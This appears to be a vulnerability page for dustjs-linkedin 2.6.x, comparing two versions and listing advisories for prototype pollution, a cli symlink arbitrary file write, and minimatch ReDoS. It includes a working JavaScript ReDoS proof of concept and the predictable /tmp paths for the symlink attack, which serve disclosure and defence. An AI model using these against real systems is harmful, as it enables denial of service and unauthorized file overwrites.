Dustjs-linkedin is LinkedIn's maintained fork of the Dust asynchronous templating engine, designed for both browser and Node.js environments. Versions 2.6.0 and 2.6.1 share the same core functionality, offering developers a versatile tool for creating dynamic user interfaces and server-side rendered content. Both declare "cli" as a runtime dependency at version ~0.6.5, which is why the cli advisory further down applies to them.
The differences between version 2.6.0 and 2.6.1 appear minimal: beyond the version bump and a release date about a week later, no functional changes are visible. Both versions carry an extensive suite of development dependencies, reflecting a focus on testing and continuous integration: Grunt for task automation, PEG.js for parser generation, and Grunt plugins for linting (jshint), minification (uglify), concatenation (concat), and testing (jasmine, jasmine-node), among others. The presence of grunt-gh-pages indicates that documentation is published to GitHub Pages as part of the build.
For developers choosing between these two versions, the decision should rest on stability, since neither release changes behaviour. Note that both 2.6.0 and 2.6.1 are below the 3.0.0 fix for the prototype pollution issue listed below, and both pull in a cli version below the 1.0.0 fix for the arbitrary file write, so moving from 2.6.0 to 2.6.1 addresses neither. If 2.6.1 turns out to carry an undocumented bug fix, upgrading is recommended; otherwise staying on 2.6.0 is acceptable. The project's MIT license allows flexible use.
All vulnerabilities affecting version 2.6.1 of the package
dustjs-linkedin vulnerable to Prototype Pollution
A vulnerability classified as problematic was found in LinkedIn dustjs prior to version 3.0.0. The advisory does not identify the affected functionality. The manipulation leads to improperly controlled modification of object prototype attributes ('prototype pollution'). The attack may be launched remotely, and the exploit has been disclosed publicly. Upgrading to version 3.0.0 addresses this issue; the fixing commit is ddb6523832465d38c9d80189e9de60519ac307c3. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216464.
Arbitrary File Write in cli
Affected versions of cli use predictable temporary file names. If an attacker can create a symbolic link at one of these temporary file paths, the attacker can write to any file that the user owning the cli process has permission to write to.
Creating a symbolic link at either of the following locations causes the target of the link to be written to:
lock_file = '/tmp/' + cli.app + '.pid',
log_file = '/tmp/' + cli.app + '.log';
Update to version 1.0.0 or later.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service (ReDoS) when user input is passed into the pattern argument of minimatch(path, pattern). The proof of concept below builds a pattern that opens a character class and follows it with one million backslashes, which makes the vulnerable pattern-to-regex conversion backtrack catastrophically:
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// unterminated character class followed by a long run of escape characters
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: on a vulnerable version the second log line never prints
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package: calling the braceExpand function with specific arguments triggers a Regular Expression Denial of Service (ReDoS), resulting in a denial of service.